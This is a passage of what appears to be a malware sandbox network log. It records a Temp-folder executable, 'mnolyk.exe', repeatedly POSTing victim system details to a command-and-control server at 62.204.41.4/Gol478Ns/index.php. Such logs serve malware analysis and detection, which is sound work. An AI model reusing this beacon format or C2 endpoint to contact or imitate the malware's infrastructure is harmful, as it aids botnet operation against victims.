                                                        Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=093954&un=user&dm=&av=13&lv=0&og=1
                                                        Feb 6, 2023 14:18:53.012109041 CET | 660 | IN | HTTP/1.1 200 OK
                                                        Server: nginx/1.18.0 (Ubuntu)
                                                        Date: Mon, 06 Feb 2023 13:18:52 GMT
                                                        Content-Type: text/html; charset=UTF-8
                                                        Transfer-Encoding: chunked
                                                        Connection: keep-alive
                                                        Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                        Data Ascii: 6<c><d>0


                                                        Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                                        46 | 192.168.2.5 | 49736 | 62.204.41.4 | 80 | C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                        Timestamp | kBytes transferred | Direction | Data
                                                        Feb 6, 2023 14:16:52.079669952 CET | 247 | OUT | POST /Gol478Ns/index.php HTTP/1.1
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Host: 62.204.41.4
                                                        Content-Length: 88
                                                        Cache-Control: no-cache
                                                        Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 30 39 33 39 35 34 26 75 6e 3d 61 6c 66 6f 6e 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                        Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=093954&un=user&dm=&av=13&lv=0&og=1
                                                        Feb 6, 2023 14:16:52.146827936 CET | 247 | IN | HTTP/1.1 200 OK
                                                        Server: nginx/1.18.0 (Ubuntu)
                                                        Date: Mon, 06 Feb 2023 13:16:52 GMT
                                                        Content-Type: text/html; charset=UTF-8
                                                        Transfer-Encoding: chunked
                                                        Connection: keep-alive
                                                        Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                        Data Ascii: 6<c><d>0


                                                        Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                                        460 | 192.168.2.5 | 50150 | 62.204.41.4 | 80 | C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                        Timestamp | kBytes transferred | Direction | Data
                                                        Feb 6, 2023 14:18:53.180274963 CET | 660 | OUT | POST /Gol478Ns/index.php HTTP/1.1
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Host: 62.204.41.4
                                                        Content-Length: 88
                                                        Cache-Control: no-cache
                                                        Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 30 39 33 39 35 34 26 75 6e 3d 61 6c 66 6f 6e 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                        Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=093954&un=user&dm=&av=13&lv=0&og=1
                                                        Feb 6, 2023 14:18:53.244153023 CET | 661 | IN | HTTP/1.1 200 OK
                                                        Server: nginx/1.18.0 (Ubuntu)
                                                        Date: Mon, 06 Feb 2023 13:18:53 GMT
                                                        Content-Type: text/html; charset=UTF-8
                                                        Transfer-Encoding: chunked
                                                        Connection: keep-alive
                                                        Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                        Data Ascii: 6<c><d>0


                                                        Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                                        461 | 192.168.2.5 | 50151 | 62.204.41.4 | 80 | C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                        Timestamp | kBytes transferred | Direction | Data
                                                        Feb 6, 2023 14:18:53.414299965 CET | 661 | OUT | POST /Gol478Ns/index.php HTTP/1.1
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Host: 62.204.41.4
                                                        Content-Length: 88
                                                        Cache-Control: no-cache
                                                        Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 30 39 33 39 35 34 26 75 6e 3d 61 6c 66 6f 6e 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                        Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=093954&un=user&dm=&av=13&lv=0&og=1
                                                        Feb 6, 2023 14:18:53.476975918 CET | 662 | IN | HTTP/1.1 200 OK
                                                        Server: nginx/1.18.0 (Ubuntu)
                                                        Date: Mon, 06 Feb 2023 13:18:53 GMT
                                                        Content-Type: text/html; charset=UTF-8
                                                        Transfer-Encoding: chunked
                                                        Connection: keep-alive
                                                        Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                        Data Ascii: 6<c><d>0


                                                        Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                                        462 | 192.168.2.5 | 50152 | 62.204.41.4 | 80 | C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                        Timestamp | kBytes transferred | Direction | Data
                                                        Feb 6, 2023 14:18:53.649178982 CET | 662 | OUT | POST /Gol478Ns/index.php HTTP/1.1
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Host: 62.204.41.4
                                                        Content-Length: 88
                                                        Cache-Control: no-cache
                                                        Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 30 39 33 39 35 34 26 75 6e 3d 61 6c 66 6f 6e 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                        Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=093954&un=user&dm=&av=13&lv=0&og=1
                                                        Feb 6, 2023 14:18:53.712241888 CET | 663 | IN | HTTP/1.1 200 OK
                                                        Server: nginx/1.18.0 (Ubuntu)
                                                        Date: Mon, 06 Feb 2023 13:18:53 GMT
                                                        Content-Type: text/html; charset=UTF-8
                                                        Transfer-Encoding: chunked
                                                        Connection: keep-alive
                                                        Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                        Data Ascii: 6<c><d>0


                                                        Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                                        463 | 192.168.2.5 | 50153 | 62.204.41.4 | 80 | C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                        Timestamp | kBytes transferred | Direction | Data
                                                        Feb 6, 2023 14:18:53.883683920 CET | 663 | OUT | POST /Gol478Ns/index.php HTTP/1.1
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Host: 62.204.41.4
                                                        Content-Length: 88
                                                        Cache-Control: no-cache
                                                        Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 30 39 33 39 35 34 26 75 6e 3d 61 6c 66 6f 6e 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                        Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=093954&un=user&dm=&av=13&lv=0&og=1
                                                        Feb 6, 2023 14:18:53.947201014 CET | 664 | IN | HTTP/1.1 200 OK
                                                        Server: nginx/1.18.0 (Ubuntu)
                                                        Date: Mon, 06 Feb 2023 13:18:53 GMT
                                                        Content-Type: text/html; charset=UTF-8
                                                        Transfer-Encoding: chunked
                                                        Connection: keep-alive
                                                        Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                        Data Ascii: 6<c><d>0


                                                        Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                                        464 | 192.168.2.5 | 50154 | 62.204.41.4 | 80 | C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                        Timestamp | kBytes transferred | Direction | Data
                                                        Feb 6, 2023 14:18:54.119780064 CET | 664 | OUT | POST /Gol478Ns/index.php HTTP/1.1
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Host: 62.204.41.4
                                                        Content-Length: 88
                                                        Cache-Control: no-cache
                                                        Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 30 39 33 39 35 34 26 75 6e 3d 61 6c 66 6f 6e 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                        Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=093954&un=user&dm=&av=13&lv=0&og=1
                                                        Feb 6, 2023 14:18:54.184797049 CET | 665 | IN | HTTP/1.1 200 OK
                                                        Server: nginx/1.18.0 (Ubuntu)
                                                        Date: Mon, 06 Feb 2023 13:18:54 GMT
                                                        Content-Type: text/html; charset=UTF-8
                                                        Transfer-Encoding: chunked
                                                        Connection: keep-alive
                                                        Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                        Data Ascii: 6<c><d>0


                                                        Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                                        465 | 192.168.2.5 | 50155 | 62.204.41.4 | 80 | C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                        Timestamp | kBytes transferred | Direction | Data
                                                        Feb 6, 2023 14:18:54.353665113 CET | 665 | OUT | POST /Gol478Ns/index.php HTTP/1.1
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Host: 62.204.41.4
                                                        Content-Length: 88
                                                        Cache-Control: no-cache
                                                        Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 30 39 33 39 35 34 26 75 6e 3d 61 6c 66 6f 6e 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                        Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=093954&un=user&dm=&av=13&lv=0&og=1
                                                        Feb 6, 2023 14:18:54.416800022 CET | 666 | IN | HTTP/1.1 200 OK
                                                        Server: nginx/1.18.0 (Ubuntu)
                                                        Date: Mon, 06 Feb 2023 13:18:54 GMT
                                                        Content-Type: text/html; charset=UTF-8
                                                        Transfer-Encoding: chunked
                                                        Connection: keep-alive
                                                        Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                        Data Ascii: 6<c><d>0


                                                        Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                                        466 | 192.168.2.5 | 50156 | 62.204.41.4 | 80 | C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                        Timestamp | kBytes transferred | Direction | Data
                                                        Feb 6, 2023 14:18:54.587905884 CET | 666 | OUT | POST /Gol478Ns/index.php HTTP/1.1
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Host: 62.204.41.4
                                                        Content-Length: 88
                                                        Cache-Control: no-cache
                                                        Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 30 39 33 39 35 34 26 75 6e 3d 61 6c 66 6f 6e 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                        Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=093954&un=user&dm=&av=13&lv=0&og=1
                                                        Feb 6, 2023 14:18:54.652446032 CET | 667 | IN | HTTP/1.1 200 OK
                                                        Server: nginx/1.18.0 (Ubuntu)
                                                        Date: Mon, 06 Feb 2023 13:18:54 GMT
                                                        Content-Type: text/html; charset=UTF-8
                                                        Transfer-Encoding: chunked
                                                        Connection: keep-alive
                                                        Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                        Data Ascii: 6<c><d>0


                                                        Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                                        467 | 192.168.2.5 | 50157 | 62.204.41.4 | 80 | C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                        Timestamp | kBytes transferred | Direction | Data
                                                        Feb 6, 2023 14:18:54.822505951 CET | 667 | OUT | POST /Gol478Ns/index.php HTTP/1.1
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Host: 62.204.41.4
                                                        Content-Length: 88
                                                        Cache-Control: no-cache
                                                        Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 30 39 33 39 35 34 26 75 6e 3d 61 6c 66 6f 6e 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                        Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=093954&un=user&dm=&av=13&lv=0&og=1
                                                        Feb 6, 2023 14:18:54.886236906 CET | 668 | IN | HTTP/1.1 200 OK
                                                        Server: nginx/1.18.0 (Ubuntu)
                                                        Date: Mon, 06 Feb 2023 13:18:54 GMT
                                                        Content-Type: text/html; charset=UTF-8
                                                        Transfer-Encoding: chunked
                                                        Connection: keep-alive
                                                        Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                        Data Ascii: 6<c><d>0


                                                        Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                                        468 | 192.168.2.5 | 50158 | 62.204.41.4 | 80 | C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                        Timestamp | kBytes transferred | Direction | Data
                                                        Feb 6, 2023 14:18:55.072146893 CET | 668 | OUT | POST /Gol478Ns/index.php HTTP/1.1
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Host: 62.204.41.4
                                                        Content-Length: 88
                                                        Cache-Control: no-cache
                                                        Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 30 39 33 39 35 34 26 75 6e 3d 61 6c 66 6f 6e 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                        Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=093954&un=user&dm=&av=13&lv=0&og=1
                                                        Feb 6, 2023 14:18:55.137774944 CET | 669 | IN | HTTP/1.1 200 OK
                                                        Server: nginx/1.18.0 (Ubuntu)
                                                        Date: Mon, 06 Feb 2023 13:18:55 GMT
                                                        Content-Type: text/html; charset=UTF-8
                                                        Transfer-Encoding: chunked
                                                        Connection: keep-alive
                                                        Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                        Data Ascii: 6<c><d>0


                                                        Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                                        469 | 192.168.2.5 | 50159 | 62.204.41.4 | 80 | C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                        Timestamp | kBytes transferred | Direction | Data
                                                        Feb 6, 2023 14:18:55.306571960 CET | 669 | OUT | POST /Gol478Ns/index.php HTTP/1.1
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Host: 62.204.41.4
                                                        Content-Length: 88
                                                        Cache-Control: no-cache
                                                        Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 30 39 33 39 35 34 26 75 6e 3d 61 6c 66 6f 6e 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                        Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=093954&un=user&dm=&av=13&lv=0&og=1
                                                        Feb 6, 2023 14:18:55.369514942 CET | 670 | IN | HTTP/1.1 200 OK
                                                        Server: nginx/1.18.0 (Ubuntu)
                                                        Date: Mon, 06 Feb 2023 13:18:55 GMT
                                                        Content-Type: text/html; charset=UTF-8
                                                        Transfer-Encoding: chunked
                                                        Connection: keep-alive
                                                        Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                        Data Ascii: 6<c><d>0


                                                        Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                                        47 | 192.168.2.5 | 49737 | 62.204.41.4 | 80 | C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                        Timestamp | kBytes transferred | Direction | Data
                                                        Feb 6, 2023 14:16:52.313327074 CET | 248 | OUT | POST /Gol478Ns/index.php HTTP/1.1
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Host: 62.204.41.4
                                                        Content-Length: 88
                                                        Cache-Control: no-cache
                                                        Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 30 39 33 39 35 34 26 75 6e 3d 61 6c 66 6f 6e 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                        Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=093954&un=user&dm=&av=13&lv=0&og=1
                                                        Feb 6, 2023 14:16:52.378164053 CET | 248 | IN | HTTP/1.1 200 OK
                                                        Server: nginx/1.18.0 (Ubuntu)
                                                        Date: Mon, 06 Feb 2023 13:16:52 GMT
                                                        Content-Type: text/html; charset=UTF-8
                                                        Transfer-Encoding: chunked
                                                        Connection: keep-alive
                                                        Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                        Data Ascii: 6<c><d>0


                                                        Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                                        470 | 192.168.2.5 | 50160 | 62.204.41.4 | 80 | C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                        Timestamp | kBytes transferred | Direction | Data
                                                        Feb 6, 2023 14:18:55.547494888 CET | 670 | OUT | POST /Gol478Ns/index.php HTTP/1.1
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Host: 62.204.41.4
                                                        Content-Length: 88
                                                        Cache-Control: no-cache
                                                        Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 30 39 33 39 35 34 26 75 6e 3d 61 6c 66 6f 6e 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                        Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=093954&un=user&dm=&av=13&lv=0&og=1
                                                        Feb 6, 2023 14:18:55.611332893 CET | 671 | IN | HTTP/1.1 200 OK
                                                        Server: nginx/1.18.0 (Ubuntu)
                                                        Date: Mon, 06 Feb 2023 13:18:55 GMT
                                                        Content-Type: text/html; charset=UTF-8
                                                        Transfer-Encoding: chunked
                                                        Connection: keep-alive
                                                        Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                        Data Ascii: 6<c><d>0


                                                        Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                                        471 | 192.168.2.5 | 50161 | 62.204.41.4 | 80 | C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                        Timestamp | kBytes transferred | Direction | Data
                                                        Feb 6, 2023 14:18:55.790925026 CET | 671 | OUT | POST /Gol478Ns/index.php HTTP/1.1
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Host: 62.204.41.4
                                                        Content-Length: 88
                                                        Cache-Control: no-cache
                                                        Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 30 39 33 39 35 34 26 75 6e 3d 61 6c 66 6f 6e 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                        Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=093954&un=user&dm=&av=13&lv=0&og=1
                                                        Feb 6, 2023 14:18:55.854116917 CET | 672 | IN | HTTP/1.1 200 OK
                                                        Server: nginx/1.18.0 (Ubuntu)
                                                        Date: Mon, 06 Feb 2023 13:18:55 GMT
                                                        Content-Type: text/html; charset=UTF-8
                                                        Transfer-Encoding: chunked
                                                        Connection: keep-alive
                                                        Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                        Data Ascii: 6<c><d>0


                                                        Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                                        472 | 192.168.2.5 | 50162 | 62.204.41.4 | 80 | C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                        Timestamp | kBytes transferred | Direction | Data
                                                        Feb 6, 2023 14:18:56.026170015 CET | 672 | OUT | POST /Gol478Ns/index.php HTTP/1.1
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Host: 62.204.41.4
                                                        Content-Length: 88
                                                        Cache-Control: no-cache
                                                        Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 30 39 33 39 35 34 26 75 6e 3d 61 6c 66 6f 6e 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                        Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=093954&un=user&dm=&av=13&lv=0&og=1
                                                        Feb 6, 2023 14:18:56.090836048 CET | 673 | IN | HTTP/1.1 200 OK
                                                        Server: nginx/1.18.0 (Ubuntu)
                                                        Date: Mon, 06 Feb 2023 13:18:56 GMT
                                                        Content-Type: text/html; charset=UTF-8
                                                        Transfer-Encoding: chunked
                                                        Connection: keep-alive
                                                        Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                        Data Ascii: 6<c><d>0


                                                        Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                                        473 | 192.168.2.5 | 50163 | 62.204.41.4 | 80 | C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                        Timestamp | kBytes transferred | Direction | Data
                                                        Feb 6, 2023 14:18:56.264796972 CET | 673 | OUT | POST /Gol478Ns/index.php HTTP/1.1
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Host: 62.204.41.4
                                                        Content-Length: 88
                                                        Cache-Control: no-cache
                                                        Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 30 39 33 39 35 34 26 75 6e 3d 61 6c 66 6f 6e 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                        Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=093954&un=user&dm=&av=13&lv=0&og=1
                                                        Feb 6, 2023 14:18:56.329933882 CET | 674 | IN | HTTP/1.1 200 OK
                                                        Server: nginx/1.18.0 (Ubuntu)
                                                        Date: Mon, 06 Feb 2023 13:18:56 GMT
                                                        Content-Type: text/html; charset=UTF-8
                                                        Transfer-Encoding: chunked
                                                        Connection: keep-alive
                                                        Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                        Data Ascii: 6<c><d>0


                                                        Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                                        474 | 192.168.2.5 | 50164 | 62.204.41.4 | 80 | C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                        Timestamp | kBytes transferred | Direction | Data
                                                        Feb 6, 2023 14:18:56.510220051 CET | 674 | OUT | POST /Gol478Ns/index.php HTTP/1.1
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Host: 62.204.41.4
                                                        Content-Length: 88
                                                        Cache-Control: no-cache
                                                        Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 30 39 33 39 35 34 26 75 6e 3d 61 6c 66 6f 6e 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                        Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=093954&un=user&dm=&av=13&lv=0&og=1
                                                        Feb 6, 2023 14:18:56.573378086 CET | 675 | IN | HTTP/1.1 200 OK
                                                        Server: nginx/1.18.0 (Ubuntu)
                                                        Date: Mon, 06 Feb 2023 13:18:56 GMT
                                                        Content-Type: text/html; charset=UTF-8
                                                        Transfer-Encoding: chunked
                                                        Connection: keep-alive
                                                        Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                        Data Ascii: 6<c><d>0


                                                        Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                                        475 | 192.168.2.5 | 50165 | 62.204.41.4 | 80 | C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                        Timestamp | kBytes transferred | Direction | Data
                                                        Feb 6, 2023 14:18:56.744687080 CET | 675 | OUT | POST /Gol478Ns/index.php HTTP/1.1
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Host: 62.204.41.4
                                                        Content-Length: 88
                                                        Cache-Control: no-cache
                                                        Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 30 39 33 39 35 34 26 75 6e 3d 61 6c 66 6f 6e 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                        Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=093954&un=user&dm=&av=13&lv=0&og=1
                                                        Feb 6, 2023 14:18:56.808456898 CET | 676 | IN | HTTP/1.1 200 OK
                                                        Server: nginx/1.18.0 (Ubuntu)
                                                        Date: Mon, 06 Feb 2023 13:18:56 GMT
                                                        Content-Type: text/html; charset=UTF-8
                                                        Transfer-Encoding: chunked
                                                        Connection: keep-alive
                                                        Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                        Data Ascii: 6<c><d>0


                                                        Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                                        476 | 192.168.2.5 | 50166 | 62.204.41.4 | 80 | C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                        Timestamp | kBytes transferred | Direction | Data
                                                        Feb 6, 2023 14:18:56.977674007 CET | 676 | OUT | POST /Gol478Ns/index.php HTTP/1.1
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Host: 62.204.41.4
                                                        Content-Length: 88
                                                        Cache-Control: no-cache
                                                        Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 30 39 33 39 35 34 26 75 6e 3d 61 6c 66 6f 6e 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                        Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=093954&un=user&dm=&av=13&lv=0&og=1
                                                        Feb 6, 2023 14:18:57.042531967 CET | 677 | IN | HTTP/1.1 200 OK
                                                        Server: nginx/1.18.0 (Ubuntu)
                                                        Date: Mon, 06 Feb 2023 13:18:57 GMT
                                                        Content-Type: text/html; charset=UTF-8
                                                        Transfer-Encoding: chunked
                                                        Connection: keep-alive
